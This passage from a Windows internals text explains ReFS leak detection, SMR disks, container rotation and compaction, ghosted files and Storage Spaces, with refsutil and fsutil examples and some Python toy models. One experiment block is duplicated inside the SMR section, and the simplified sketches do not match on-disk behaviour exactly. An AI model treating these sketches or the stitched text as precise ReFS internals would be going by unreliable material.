the scrubber sends the FSCTL to the ReFS driver, the latter starts an integrity check of the entire volume:
the ReFS driver checks the boot section, each global B+ tree, and file system’s metadata.
Note The online Salvage operation, described in this section, is different from its offline
counterpart. The refsutil.exe tool, which is included in Windows, supports this operation.
The tool is used when the volume is so corrupted that it is not even mountable in read-only
mode (a rare condition). The offline Salvage operation navigates through all the volume
clusters, looking for what appears to be metadata pages, and uses best-effort techniques
to assemble them back together.
Leak detection
A cluster leak describes the situation in which a cluster is marked as allocated, but there are no refer-
ences to it. In ReFS, cluster leaks can happen for different reasons. When a corruption is detected on
a directory, online salvage is able to isolate the corruption and rebuild the tree, eventually losing only
some files that were located in the root directory itself. A system crash before the tree update algo-
rithm has written a Minstore transaction to disk can lead to a file name getting lost. In this case, the
file’s data is correctly written to disk, but ReFS has no metadata that point to it. The B+ tree table repre-
senting the file itself can still exist somewhere in the disk, but its embedded table is no longer linked in
any directory B+ tree.
The built-in refsutil.exe tool available in Windows supports the Leak Detection operation, which can
scan the entire volume and, using Minstore, navigate through the entire volume namespace. It then
builds a list of every B+ tree found in the namespace (every tree is identified by a well-known data
structure that contains an identification header), and, by querying the Minstore allocators, compares
the list of each identified tree with the list of trees that have been marked valid by the allocator. If it
finds a discrepancy, the leak detection tool notifies the ReFS file system driver, which will mark the clus-
ters allocated for the found leaked tree as freed.
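At its core, the scan reduces to a set comparison between trees reachable from the namespace and clusters the allocator considers in use; the sketch below models only that idea:

```python
# Leak detection reduced to a set difference: clusters the allocator has
# marked allocated, minus clusters reachable by walking the namespace.
# All structures here are stand-ins for the real on-disk metadata.

def find_leaks(namespace_trees, allocator_marked):
    # namespace_trees: {tree id: set of clusters reachable from the root}
    reachable = set()
    for clusters in namespace_trees.values():
        reachable |= clusters
    return allocator_marked - reachable    # allocated but unreferenced

trees = {"dir1": {1, 2, 3}, "file7": {10, 11}}
allocated = {1, 2, 3, 10, 11, 40, 41}      # 40-41 orphaned after a crash
leaked = find_leaks(trees, allocated)
assert leaked == {40, 41}
```

In the real tool the "reachable" side comes from navigating every B+ tree found in the namespace, but the comparison against the allocator's view is the same in spirit.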
Another kind of leak that can happen on the volume affects the block reference counter table, such
as when a cluster’s range located in one of its rows has a higher reference counter number than the
actual files that reference it. The leak detection tool is able to count the correct number of references and
fix the problem.
To correctly identify and fix leaks, the leak detection tool must operate on an offline volume, but,
using a similar technique to NTFS’ online scan, it can operate on a read-only snapshot of the target
volume, which is provided by the Volume Shadow Copy service.
EXPERIMENT: Use Refsutil to find and fix leaks on a ReFS volume
In this experiment, you use the built-in refsutil.exe tool on a ReFS volume to find and fix cluster
leaks that could happen on a ReFS volume. By default, the tool doesn’t require a volume to be
unmounted because it operates on a read-only volume snapshot. To let the tool fix the found
leaks, you can override the setting by using the /x command-line argument. Open an adminis-
trative command prompt and type the following command. (In the example, a 1 TB ReFS volume
was mounted as the E: drive. The /v switch enables the tool’s verbose output.)
C:\>refsutil leak /v e:
Creating volume snapshot on drive \\?\Volume{92aa4440-51de-4566-8c00-bc73e0671b92}...
Creating the scratch file...
Beginning volume scan... This may take a while...
Begin leak verification pass 1 (Cluster leaks)...
End leak verification pass 1. Found 0 leaked clusters on the volume.
Begin leak verification pass 2 (Reference count leaks)...
End leak verification pass 2. Found 0 leaked references on the volume.
Begin leak verification pass 3 (Compacted cluster leaks)...
End leak verification pass 3.
Begin leak verification pass 4 (Remaining cluster leaks)...
End leak verification pass 4. Fixed 0 leaks during this pass.
Finished.
Found leaked clusters: 0
Found reference leaks: 0
Total cluster fixed : 0
Shingled magnetic recording (SMR) volumes
At the time of this writing, one of the biggest problems that classical rotating hard disks are facing is
in regard to the physical limitations inherent to the recording process. To increase disk size, the drive
platter area density must always increase, while, to be able to read and write tiny units of information,
the physical size of the heads of the spinning drives continue to get increasingly smaller. In turn, this
causes the energy barrier for bit flips to decrease, which means that ambient thermal energy is more
likely to accidentally flip bits, reducing data integrity. Although solid state drives (SSDs) have spread to a lot of
consumer systems, large storage servers still require the greater capacity at lower cost that rotational drives
provide. Multiple solutions have been designed to overcome the rotating hard-disk problem. The
most effective is called shingled magnetic recording (SMR), which is shown in Figure 11-91. Unlike PMR
(perpendicular magnetic recording), which uses a parallel track layout, the head used for reading the
data in SMR disks is smaller than the one used for writing. The larger writer means it can more effec-
tively magnetize (write) the media without having to compromise readability or stability.
EXPERIMENT: Use Refsutil to find and fix leaks on a ReFS volume
In this experiment, you use the built-in refsutil.exe tool on a ReFS volume to find and fix cluster
leaks that could happen on a ReFS volume. By default, the tool doesn’t require a volume to be
unmounted because it operates on a read-only volume snapshot. To let the tool fix the found
leaks, you can override the setting by using the /x command-line argument. Open an adminis-
trative command prompt and type the following command. (In the example, a 1 TB ReFS volume
was mounted as the E: drive. The /v switch enables the tool’s verbose output.)
C:\>refsutil leak /v e:
Creating volume snapshot on drive \\?\Volume{92aa4440-51de-4566-8c00-bc73e0671b92}...
Creating the scratch file...
Beginning volume scan... This may take a while...
Begin leak verification pass 1 (Cluster leaks)...
End leak verification pass 1. Found 0 leaked clusters on the volume.
Begin leak verification pass 2 (Reference count leaks)...
End leak verification pass 2. Found 0 leaked references on the volume.
Begin leak verification pass 3 (Compacted cluster leaks)...
End leak verification pass 3.
Begin leak verification pass 4 (Remaining cluster leaks)...
End leak verification pass 4. Fixed 0 leaks during this pass.
Finished.
Found leaked clusters: 0
Found reference leaks: 0
Total cluster fixed : 0
CHAPTER 11
Caching and file systems
763
FIGURE 11-91 In SMR disks, the writer track is larger than the reader track.
The new configuration leads to some logical problems. It is almost impossible to write to a disk track
without partially replacing the data on the consecutive track. To solve this problem, SMR disks split the
drive into zones, which are technically called bands. There are two main kinds of zones:
■	Conventional (or fast) zones work like traditional PMR disks, in which random writes are allowed.
■	Write pointer zones are bands that have their own “write pointer” and require strictly sequential writes. (This is not exactly true, as host-aware SMR disks also support a concept of write preferred zones, in which random writes are still supported. This kind of zone isn’t used by ReFS though.)
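The write-pointer discipline just described can be illustrated with a small model (a hypothetical Python sketch, not actual drive firmware): a sequential-write zone accepts a write only at its current write pointer and refuses anything else, while a conventional zone accepts random writes anywhere.

```python
# Toy model of SMR zone behavior (illustrative only; class and method
# names are invented for this sketch).

class ConventionalZone:
    """PMR-like zone: random writes allowed anywhere."""
    def __init__(self, clusters):
        self.data = [None] * clusters

    def write(self, lba, value):
        self.data[lba] = value

class SequentialWriteZone:
    """Zone with a hardware write pointer: writes must be strictly sequential."""
    def __init__(self, clusters):
        self.data = [None] * clusters
        self.write_pointer = 0

    def write(self, lba, value):
        if lba != self.write_pointer:
            # A non-sequential write would partially overwrite neighboring
            # shingled tracks, so the firmware refuses it.
            raise IOError("non-sequential write refused")
        self.data[lba] = value
        self.write_pointer += 1

zone = SequentialWriteZone(4)
zone.write(0, "a")
zone.write(1, "b")
try:
    zone.write(3, "c")        # skips the write pointer: refused
except IOError as e:
    print("refused:", e)
```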
Each band in an SMR disk is usually 256 MB and works as a basic unit of I/O. This means that the sys-
tem can write in one band without interfering with the next band. There are three types of SMR disks:
■	Drive-managed: The drive appears to the host identical to a nonshingled drive. The host does not need to follow any special protocol, as all handling of data and the existence of the disk zones and sequential write constraints is managed by the device’s firmware. This type of SMR disk is great for compatibility but has some limitations: the disk cache used to transform random writes into sequential ones is limited, band cleaning is complex, and sequential write detection is not trivial. These limitations hamper performance.
■	Host-managed: The device requires strict adherence to special I/O rules by the host. The host is required to write sequentially so as not to destroy existing data. The drive refuses to execute commands that violate this assumption. Host-managed drives support only sequential write zones and conventional zones, where the latter could be any media, including non-SMR, drive-managed SMR, and flash.
■	Host-aware: A combination of drive-managed and host-managed, the drive can manage the shingled nature of the storage and will execute any command the host gives it, regardless of whether it’s sequential. However, the host is aware that the drive is shingled and can query the drive for SMR zone information. This allows the host to optimize writes for the shingled nature while also allowing the drive to be flexible and backward-compatible. Host-aware drives support the concept of sequential write preferred zones.
At the time of this writing, ReFS is the only file system that can support host-managed SMR disks
natively. The strategy used by ReFS for supporting these kinds of drives, which can achieve very large
capacities (20 terabytes or more), is the same as the one used for tiered volumes, usually generated by
Storage Spaces (see the final section for more information about Storage Spaces).
ReFS support for tiered volumes and SMR
Tiered volumes are similar to host-aware SMR disks. They’re composed of a fast, random-access area
(usually provided by an SSD) and a slower sequential-write area. This isn’t a requirement, though; tiered
disks can be composed of different random-access disks, even of the same speed. ReFS is able to
properly manage tiered volumes (and SMR disks) by providing a new logical indirection layer between files
and directory namespace on top of the volume namespace. This new layer divides the volume into
logical containers, which do not overlap (so a given cluster is present in only one container at a time). A
container represents an area in the volume, and all containers on a volume are always of the same size,
which is defined based on the type of the underlying disk: 64 MB for standard tiered disks and 256 MB
for SMR disks. Containers are called ReFS bands because when they’re used with SMR disks, the containers’
size becomes exactly the same as the SMR bands’ size, and each container maps one-to-one to each
SMR band.
The indirection layer is configured and provided by the global container table, as shown in Figure 11-92.
The rows of this table are composed of keys that store the ID and the type of the container. Based on
the type of container (which could also be a compacted or compressed container), the row’s data
differs. For noncompacted containers (details about ReFS compaction are available in the next
section), the row’s data is a data structure that contains the mapping of the cluster range addressed by the
container. This provides ReFS with a virtual LCN-to-real LCN namespace mapping.
FIGURE 11-92 The container table provides a virtual LCN-to-real LCN indirection layer.
The container table is important: all the data managed by ReFS and Minstore needs to pass through
the container table (with only small exceptions), so ReFS maintains multiple copies of this vital table.
To perform an I/O on a block, ReFS must first look up the location of the extent’s container to find the
real location of the data. This is achieved through the extent table, which contains the target virtual LCN
of the cluster range in the data section of its rows. The container ID is derived from the LCN through a
mathematical relationship. The new level of indirection allows ReFS to move the location of containers
without consulting or modifying the file extent tables.
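The mathematical relationship can be sketched as follows, assuming the standard 64-MB container (0x400 clusters of 64 KB each). The table contents and helper names are hypothetical, chosen only to illustrate the lookup; the real on-disk layout is more involved.

```python
# Sketch of the virtual-LCN-to-real-LCN indirection (illustrative only).
# Assumed container size: 0x400 clusters (64 MB with 64-KB clusters).

CLUSTERS_PER_CONTAINER = 0x400

# Container table: container ID -> first real LCN of the container
# (hypothetical single entry: container 32 mapped at real LCN 0xB800).
container_table = {32: 0xB800}

def container_id(virtual_lcn):
    # Containers are virtually contiguous, so the ID follows from a
    # simple division; no lookup is needed to find it.
    return virtual_lcn // CLUSTERS_PER_CONTAINER

def to_real_lcn(virtual_lcn):
    cid = container_id(virtual_lcn)
    offset = virtual_lcn % CLUSTERS_PER_CONTAINER
    return container_table[cid] + offset

print(hex(container_id(0x8000)))   # virtual LCN 0x8000 -> container 0x20 (32)
print(hex(to_real_lcn(0x8110)))    # 0xB800 + 0x110 = 0xB910
```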
ReFS consumes tiers produced by Storage Spaces, hardware tiered volumes, and SMR disks. ReFS
redirects small random I/Os to a portion of the faster tiers and destages those writes in batches to the
slower tiers using sequential writes (destages happen at container granularity). Indeed, in ReFS, the
term fast tier (or flash tier) refers to the random-access zone, which might be provided by the conven-
tional bands of an SMR disk, or by the totality of an SSD or NVMe device. The term slow tier (or HDD
tier) refers instead to the sequential-write bands or to a rotating disk. ReFS uses different behaviors
based on the class of the underlying medium. Non-SMR disks have no sequential requirements, so
clusters can be allocated from anywhere on the volume; SMR disks, as discussed previously, have
strictly sequential requirements, so ReFS never writes random data on the slow tier.
By default, all of the metadata that ReFS uses needs to stay in the fast tier; ReFS tries to use the
fast tier even when processing general write requests. In non-SMR disks, as flash containers fill, ReFS
moves containers from flash to HDD (this means that in a continuous write workload, ReFS is continu-
ally moving containers from flash into HDD). ReFS is also able to do the opposite when needed—select
containers from the HDD and move them into flash to fill with subsequent writes. This feature is called
container rotation and is implemented in two stages. After the storage driver has copied the actual
data, ReFS modifies the container LCN mapping shown earlier. No modification in any file’s extent
table is needed.
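Container rotation can be pictured with the same kind of toy mapping (an illustrative sketch; all names and values here are hypothetical): after the storage driver copies the data to the destination tier, only the container-table entry is rewritten, while the file extent table, which holds virtual LCNs, is never touched.

```python
# Illustrative model of container rotation (not ReFS code): moving a
# container between tiers rewrites only the container-table mapping.

CLUSTERS_PER_CONTAINER = 0x400
container_table = {32: 0xB800}       # container 32 currently on the HDD tier
file_extent = {"vlcn": 0x8110}       # a file extent, stored as a virtual LCN

def to_real_lcn(vlcn):
    return container_table[vlcn // CLUSTERS_PER_CONTAINER] + vlcn % CLUSTERS_PER_CONTAINER

before = to_real_lcn(file_extent["vlcn"])

# Rotation: the data is copied to a flash-resident band, then remapped.
container_table[32] = 0x1000         # hypothetical real LCN on the fast tier

after = to_real_lcn(file_extent["vlcn"])
print(hex(before), "->", hex(after)) # the extent table itself never changed
```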
Container rotation is implemented only for non-SMR disks. This is important, because in SMR
disks, the ReFS file system driver never automatically moves data between tiers. Applications that are
SMR disk–aware and want to write data in the SMR capacity tier can use the FSCTL_SET_REFS_FILE_
STRICTLY_SEQUENTIAL control code. If an application sends the control code on a file handle, the ReFS
driver writes all of the new data in the capacity tier of the volume.
EXPERIMENT: Witnessing SMR disk tiers
You can use the FsUtil tool, which is provided by Windows, to query the information of an SMR
disk, like the size of each tier, the usable and free space, and so on. To do so, just run the tool in
an administrative command prompt. You can launch the command prompt as administrator by
searching for cmd in the Cortana Search box and by selecting Run As Administrator after right-
clicking the Command Prompt label. Input the following parameters:
fsutil volume smrInfo <VolumeDrive>
replacing the VolumeDrive part with the drive letter of your SMR disk.
Furthermore, you can start a garbage collection (see the next paragraph for details about this
feature) through the following command:
fsutil volume smrGc <VolumeDrive> Action=startfullspeed
The garbage collection can even be stopped or paused through the relative Action param-
eter. You can start a more precise garbage collection by specifying the IoGranularity parameter,
which specifies the granularity of the garbage collection I/O, and using the start action instead
of startfullspeed.
Container compaction
Container rotation has performance problems, especially when storing small files that don’t usually
fit into an entire band. Furthermore, in SMR disks, container rotation is never executed, as we ex-
plained earlier. Recall that each SMR band has an associated write pointer (hardware implemented),
which identifies the location for sequential writing. If the system were to write before or after the write
pointer in a non-sequential way, it would corrupt data located in other clusters (the SMR firmware must
therefore refuse such a write).
ReFS supports two types of containers: base containers, which map a virtual cluster’s range directly
to physical space, and compacted containers, which map a virtual container to many different base
containers. To correctly map the correspondence between the space mapped by a compacted contain-
er and the base containers that compose it, ReFS implements an allocation bitmap, which is stored in
the rows of the global container index table (another table, in which every row describes a single com-
pacted container). The bitmap has a bit set to 1 if the relative cluster is allocated; otherwise, it’s set to 0.
Figure 11-93 shows an example of a base container (C32) that maps a range of virtual LCNs (0x8000
to 0x8400) to real volume’s LCNs (0xB800 to 0xBC00, identified by R46). As previously discussed, the
container ID of a given virtual LCN range is derived from the starting virtual cluster number; all the
containers are virtually contiguous. In this way, ReFS never needs to look up a container ID for a given
container range. Container C32 of Figure 11-93 has only 560 (0x230) of its 1,024 clusters contiguously
allocated. Only the free space at the end of the base container can be used by ReFS; alternatively, for
non-SMR disks, if a big chunk of space located in the middle of the base container is freed, it
can be reused too. Even for non-SMR disks, the important requirement here is that the space must
be contiguous.
If the container becomes fragmented (because some small file extents are eventually freed), ReFS
can convert the base container into a compacted container. This operation allows ReFS to reuse the
container’s free space, without reallocating any row in the extent table of the files that are using the
clusters described by the container itself.
FIGURE 11-93 An example of a base container addressed by a 210 MB file. Container C32 uses only 35 MB of its
64 MB space.
ReFS provides a way to defragment containers that are fragmented. During normal system I/O
activity, there are a lot of small files or chunks of data that need to be updated or created. As a result,
containers located in the slow tier can hold small chunks of freed clusters and can become quickly
fragmented. Container compaction is the name of the feature that generates new empty bands in the
slow tier, allowing containers to be properly defragmented. Container compaction is executed only in
the capacity tier of a tiered volume and has been designed with two different goals:
■	Compaction is the garbage collector for SMR disks: In SMR, ReFS can only write data in the capacity zone in a sequential manner. Small data can’t be individually updated in a container located in the slow tier. The data doesn’t reside at the location pointed to by the SMR write pointer, so any I/O of this kind can potentially corrupt other data that belongs to the band. In that case, the data is copied into a new band. Non-SMR disks don’t have this problem; ReFS updates data residing in the slow tier directly.
■	In non-SMR tiered volumes, compaction is the generator for container rotation: The generated free containers can be used as targets for forward rotation when data is moved from the fast tier to the slow tier.
ReFS, at volume-format time, allocates some base containers from the capacity tier just for
compaction; these are called compacted reserved containers. Compaction works by initially searching for
fragmented containers in the slow tier. ReFS reads the fragmented container into system memory and
defragments it. The defragmented data is then stored in a compacted reserved container, located in
the capacity tier, as described above. The original container, which is addressed by the file extent table,
becomes compacted. The range that describes it becomes virtual (compaction adds another indirection
layer), pointing to virtual LCNs described by another base container (the reserved container). At
the end of the compaction, the original physical container is marked as freed and is reused for different
purposes. It can also become a new compacted reserved container. Because containers located in the
slow tier usually become highly fragmented in a relatively short time, compaction can generate a lot of
empty bands in the slow tier.
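The compaction flow described above can be sketched as a small model (illustrative only; the function and data layout are hypothetical simplifications): the surviving clusters of a fragmented band are rewritten sequentially into a reserved container, and the original band becomes empty and reusable.

```python
# Conceptual sketch of container compaction (not ReFS code).
# A band is modeled as a list of clusters; None marks a freed cluster.

def compact(fragmented_band, reserved_band):
    """Copy allocated clusters, in order, to the head of the reserved band."""
    survivors = [c for c in fragmented_band if c is not None]
    reserved_band[:len(survivors)] = survivors
    # The original physical container is freed and can be reused,
    # for example as a new compacted reserved container.
    fragmented_band[:] = [None] * len(fragmented_band)
    return len(survivors)

band = ["a", None, "b", None, None, "c", None, None]   # highly fragmented
reserved = [None] * 8                                  # compacted reserved container
moved = compact(band, reserved)
print(moved, reserved)
```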
The clusters allocated by a compacted container can be stored in different base containers. To
properly manage such clusters, ReFS uses another layer of indirection, which is provided by the global
container index table and by a different layout of the compacted container. Figure 11-94 shows the
same container as Figure 11-93, which has been compacted because it was fragmented (272 of its 560
clusters have been freed). In the container table, the row that describes a compacted container stores
the mapping between the cluster range described by the compacted container and the virtual clusters
described by the base containers. Compacted containers support a maximum of four different ranges
(called legs). The four legs create the second indirection layer and allow ReFS to perform the container
defragmentation in an efficient way. The allocation bitmap of the compacted container provides the
second indirection layer, too. By checking the position of the allocated clusters (which correspond to a
1 in the bitmap), ReFS is able to correctly map each fragmented cluster of a compacted container.
In the example in Figure 11-94, the first bit set to 1 is at position 17, which is 0x11 in hexadecimal. In
the example, one bit corresponds to 16 clusters; in the actual implementation, though, one bit corre-
sponds to one cluster only. This means that the first cluster allocated at offset 0x110 in the compacted
container C32 is stored at the virtual cluster 0x1F2E0 in the base container C124. The free space avail-
able after the cluster at offset 0x230 in the compacted container C32, is mapped into base container
C56. The physical container R46 has been remapped by ReFS and has become an empty compacted
reserved container, mapped by the base container C180.
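The arithmetic above can be checked with a small model built from these values. Note that this is only an illustrative sketch: the rank-based way the bitmap is combined with the legs is an assumption made here for clarity, not the documented on-disk algorithm, and the 1-bit-per-16-clusters granularity follows the figure rather than the actual implementation.

```python
# Worked sketch of the compacted-container lookup, using the example
# values discussed in the text (illustrative model only).

CLUSTERS_PER_BIT = 16

# C32's allocation bitmap: the first set bit is at position 17 (0x11),
# so the first allocated cluster sits at offset 17 * 16 = 0x110.
bitmap = [0] * 17 + [1] * 12 + [0] * 35          # 64 bits = 1,024 clusters

# The legs map the allocated clusters, in order, onto virtual LCN ranges
# belonging to base containers (C124 and C56 in the example).
legs = [(0x1F2E0, 0x1F400), (0x1C400, 0x1C6F0)]

def map_offset(cluster_offset):
    """Map an allocated cluster offset in C32 to a virtual LCN in a leg."""
    bit = cluster_offset // CLUSTERS_PER_BIT
    if not bitmap[bit]:
        raise ValueError("offset not allocated")
    # Rank = number of allocated clusters that precede this offset.
    rank = sum(bitmap[:bit]) * CLUSTERS_PER_BIT + cluster_offset % CLUSTERS_PER_BIT
    for start, end in legs:
        if rank < end - start:
            return start + rank
        rank -= end - start
    raise ValueError("beyond mapped space")

print(hex(map_offset(0x110)))   # first allocated cluster -> 0x1F2E0 in C124
```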
FIGURE 11-94 Container C32 has been compacted in base container C124 and C56.
In SMR disks, the process that starts the compaction is called garbage collection. For SMR disks, an
application can decide to manually start, stop, or pause the garbage collection at any time through the
FSCTL_SET_REFS_SMR_VOLUME_GC_PARAMETERS file system control code.
In contrast to NTFS, on non-SMR disks, the ReFS volume analysis engine can automatically start the
container compaction process. ReFS keeps track of the free space of both the slow and fast tier and the
available writable free space of the slow tier. If the difference between the free space and the available
space exceeds a threshold, the volume analysis engine kicks off and starts the compaction process.
Furthermore, if the underlying storage is provided by Storage Spaces, the container compaction runs
periodically and is executed by a dedicated thread.
Compression and ghosting
ReFS does not support native file system compression, but, on tiered volumes, the file system is able to
save more free containers on the slow tier thanks to container compression. Every time ReFS performs
container compaction, it reads in memory the original data located in the fragmented base container.
At this stage, if compression is enabled, ReFS compresses the data and finally writes it in a compressed
compacted container. ReFS supports four different compression algorithms: LZNT1, LZX, XPRESS, and
XPRESS_HUFF.
Many hierarchical storage management (HSM) software solutions support the concept of a ghosted
file. This state can be obtained for many different reasons. For example, when the HSM migrates the
user file (or some chunks of it) to a cloud service, and the user later modifies the copy located in the
cloud through a different device, the HSM filter driver needs to keep track of which parts of the file
changed and needs to set the ghosted state on each modified file range. Usually HSMs keep track
of the ghosted state through their filter drivers. In ReFS, this isn’t needed because the ReFS file system
exposes a new I/O control code, FSCTL_GHOST_FILE_EXTENTS. Filter drivers can send the IOCTL to the
ReFS driver to set part of the file as ghosted. Furthermore, they can query the file’s ranges that are in
the ghosted state through another I/O control code: FSCTL_QUERY_GHOSTED_FILE_EXTENTS.
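The interplay between the ghosted state and a filter driver can be pictured with a conceptual model (the classes and error below are invented for illustration; the real mechanism uses the FSCTL control codes above on a file handle, and kernel-mode filtering of STATUS_GHOSTED):

```python
# Conceptual model of ghosted file extents (illustrative only).
# Ghosted ranges are flagged alongside the file's data; a read that hits
# one fails with a STATUS_GHOSTED-like error that a filter driver could
# intercept and redirect (for instance, to a cloud copy).

class GhostedExtentError(Exception):
    pass

class File:
    def __init__(self, data):
        self.data = bytearray(data)
        self.ghosted = []                 # list of (start, end) ghosted ranges

    def ghost_extent(self, start, end):   # models FSCTL_GHOST_FILE_EXTENTS
        self.ghosted.append((start, end))

    def read(self, start, length):
        for g0, g1 in self.ghosted:
            if start < g1 and start + length > g0:
                raise GhostedExtentError((g0, g1))
        return bytes(self.data[start:start + length])

f = File(b"local contents..")
f.ghost_extent(6, 14)                     # this range now lives elsewhere
print(f.read(0, 4))                       # plain local read succeeds
try:
    f.read(8, 4)                          # hits the ghosted range
except GhostedExtentError as e:
    print("redirect read for range", e.args[0])
```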
ReFS implements ghosted files by storing the new state information directly in the file’s extent
table, which is implemented through an embedded table in the file record, as explained in the previ-
ous section. A filter driver can set the ghosted state for every range of the file (which must be cluster-
aligned). When the ReFS driver intercepts a read request for an extent that is ghosted, it returns a
STATUS_GHOSTED error code to the caller, which a filter driver can then intercept and redirect the read
to the proper place (the cloud in the previous example).
Storage Spaces
Storage Spaces is the technology that replaces dynamic disks and provides virtualization of physical
storage hardware. It was initially designed for large storage servers but is available even in client editions
of Windows 10. Storage Spaces also allows the user to create virtual disks composed of different
underlying physical media, which can have different performance characteristics.
At the time of this writing, Storage Spaces is able to work with four types of storage devices:
Nonvolatile memory express (NVMe) flash disks, persistent memory (PM), SATA and SAS solid state
drives (SSDs), and classical rotating hard disks (HDDs). NVMe is considered the fastest, and HDD is the
slowest. Storage Spaces was designed with four goals:
■	Performance: Spaces implements support for a built-in server-side cache to maximize storage performance and supports tiered disks and RAID 0 configurations.
■	Reliability: Other than span volumes (RAID 0), Spaces supports Mirror (RAID 1 and 10) and Parity (RAID 5, 6, 50, 60) configurations when data is distributed across different physical disks or different nodes of the cluster.
■	Flexibility: Storage Spaces allows the system to create virtual disks that can be automatically moved between a cluster’s nodes and that can be automatically shrunk or extended based on real space consumption.
■	Availability: Storage Spaces volumes have built-in fault tolerance. This means that if a drive, or even an entire server that is part of the cluster, fails, Spaces can redirect the I/O traffic to other working nodes without any user intervention (and in a transparent way). Storage Spaces doesn’t have a single point of failure.
Storage Spaces Direct is the evolution of the Storage Spaces technology. Storage Spaces Direct is
designed for large datacenters, where multiple servers, which contain different slow and fast disks, are
used together to create a pool. The previous technology didn’t support clusters of servers that weren’t
attached to JBOD disk arrays; therefore, the term direct was added to the name. All servers are con-
nected through a fast Ethernet connection (10GBe or 40GBe, for example). Presenting remote disks
as local to the system is made possible by two drivers—the cluster miniport driver (Clusport.sys) and
the cluster block filter driver (Clusbflt.sys)—which are outside the scope of this chapter. All the storage
physical units (local and remote disks) are added to a storage pool, which is the main unit of manage-
ment, aggregation, and isolation, from where virtual disks can be created.
The entire storage cluster is mapped internally by Spaces using an XML file called BluePrint. The file
is automatically generated by the Spaces GUI and describes the entire cluster using a tree of different
storage entities: Racks, Chassis, Machines, JBODs (Just a Bunch of Disks), and Disks. These entities com-
pose each layer of the entire cluster. A server (machine) can be connected to different JBODs or have
different disks directly attached to it. In this case, a JBOD is abstracted and represented only by one
entity. In the same way, multiple machines might be located on a single chassis, which could be part
of a server rack. Finally, the cluster could be made up of multiple server racks. By using the Blueprint
representation, Spaces is able to work with all the cluster disks and redirect I/O traffic to the correct
replacement in case a fault on a disk, JBOD, or machine occurs. Spaces Direct can tolerate a maximum
of two concurrent faults.
Spaces internal architecture
One of the biggest differences between Spaces and dynamic disks is that Spaces creates virtual disk
objects, which are presented to the system as actual disk device objects by the Spaces storage driver
(Spaceport.sys). Dynamic disks operate at a higher level: virtual volume objects are exposed to the
system (meaning that user mode applications can still access the original disks). The volume manager
is the component responsible for creating the single volume composed of multiple dynamic volumes.
The Storage Spaces driver is a filter driver (a full filter driver rather than a minifilter) that lies between
the partition manager (Partmgr.sys) and the disk class driver.
Storage Spaces architecture is shown in Figure 11-95 and is composed mainly of two parts: a
platform-independent library, which implements the Spaces core, and an environment part, which
is platform-dependent and links the Spaces core to the current environment. The Environment layer
provides to Storage Spaces the basic core functionalities that are implemented in different ways based
on the platform on which they run (because storage spaces can be used as bootable entities, the
Windows boot loader and boot manager need to know how to parse storage spaces, hence the need
for both a UEFI and Windows implementation). The core basic functionality includes memory manage-
ment routines (alloc, free, lock, unlock and so on), device I/O routines (Control, Pnp, Read, and Write),
and synchronization methods. These functions are generally wrappers to specific system routines. For
example, the read service, on Windows platforms, is implemented by creating an IRP of type IRP_MJ_
READ and sending it to the correct disk driver, while, in UEFI environments, it’s implemented by
using the BLOCK_IO_PROTOCOL.
FIGURE 11-95 Storage Spaces architecture.
Other than the boot and Windows kernel implementation, storage spaces must also be available
during crash dumps, which is provided by the Spacedump.sys crash dump filter driver. Storage Spaces is
even available as a user-mode library (Backspace.dll), which is compatible with legacy Windows operat-
ing systems that need to operate with virtual disks created by Spaces (especially the VHD file), and even
as a UEFI DXE driver (HyperSpace.efi), which can be executed by the UEFI BIOS, in cases where even the
EFI System Partition itself is present on a storage space entity. Some new Surface devices are sold with a
large solid-state disk that is actually composed of two or more fast NVMe disks.
Spaces Core is implemented as a static library, which is platform-independent and is imported by
all of the different environment layers. It is composed of four layers: Core, Store, Metadata, and IO.
The Core is the highest layer and implements all the services that Spaces provides. Store is the
component that reads and writes records that belong to the cluster database (created from the BluePrint
file). Metadata interprets the binary records read by the Store and exposes the entire cluster database
through different objects: Pool, Drive, Space, Extent, Column, Tier, and Metadata. The IO component,
which is the lowest layer, can emit I/Os to the correct device in the cluster in the proper sequential way,
thanks to data parsed by the higher layers.
Services provided by Spaces
Storage Spaces supports different disk type configurations. With Spaces, the user can create virtual
disks composed entirely of fast disks (SSD, NVMe, and PM), slow disks, or even composed of all four
supported disk types (hybrid configuration). In case of hybrid deployments, where a mix of different
classes of devices are used, Spaces supports two features that allow the cluster to be fast and efficient:
■	Server cache: Storage Spaces is able to hide a fast drive from the cluster and use it as a cache for the slower drives. Spaces supports PM disks to be used as a cache for NVMe or SSD disks, NVMe disks to be used as a cache for SSD disks, and SSD disks to be used as a cache for classical rotating HDD disks. Unlike tiered disks, the cache is invisible to the file system that resides on top of the virtual volume. This means that the cache has no idea whether a file has been accessed more recently than another file. Spaces implements a fast cache for the virtual disk by using a log that keeps track of hot and cold blocks. Hot blocks represent parts of files (file extents) that are often accessed by the system, whereas cold blocks represent parts of files that are barely accessed. The log implements the cache as a queue, in which the hot blocks are always at the head and cold blocks are at the tail. In this way, cold blocks can be deleted from the cache if it’s full and be maintained only on the slower storage; hot blocks usually stay in the cache for a longer time.
■	Tiering: Spaces can create tiered disks, which are managed by ReFS and NTFS. Whereas ReFS supports SMR disks, NTFS only supports tiered disks provided by Spaces. The file system keeps track of the hot and cold blocks and rotates the bands based on the files’ usage (see the “ReFS support for tiered volumes and SMR” section earlier in this chapter). Spaces provides the file system driver with support for pinning, a feature that can pin a file to the fast tier and lock it in the tier until it is unpinned. In this case, no band rotation is ever executed. Windows uses the pinning feature to store new files on the fast tier while performing an OS upgrade.
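The hot/cold block queue can be sketched with a minimal model (an illustrative LRU-style sketch; the class name and eviction policy details are assumptions, not the Spaces implementation): hot blocks sit at the head, cold blocks drift to the tail, and the coldest blocks are evicted to slower storage when the cache fills up.

```python
# Toy model of the hot/cold block log (illustrative only).
from collections import OrderedDict

class BlockCache:
    def __init__(self, capacity):
        self.capacity = capacity
        self.blocks = OrderedDict()       # last entry = hot head, first = cold tail

    def access(self, block, data):
        if block in self.blocks:
            self.blocks.move_to_end(block)    # re-heat an already-cached block
        else:
            self.blocks[block] = data
        evicted = []
        while len(self.blocks) > self.capacity:
            # Drop the coldest block; it stays only on the slower storage.
            evicted.append(self.blocks.popitem(last=False))
        return evicted

cache = BlockCache(2)
cache.access("A", 1)
cache.access("B", 2)
cache.access("A", 1)                      # A becomes hot again
evicted = cache.access("C", 3)            # B is now the coldest and is evicted
print([b for b, _ in evicted])
```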
As discussed previously, one of the main goals of Storage Spaces is flexibility. Spaces
supports the creation of virtual disks that are extensible and consume only allocated space in the
underlying cluster’s devices; this kind of virtual disk is called thin provisioned. Unlike fixed provisioned
disks, where all of the space is allocated to the underlying storage cluster, thin provisioned disks al-
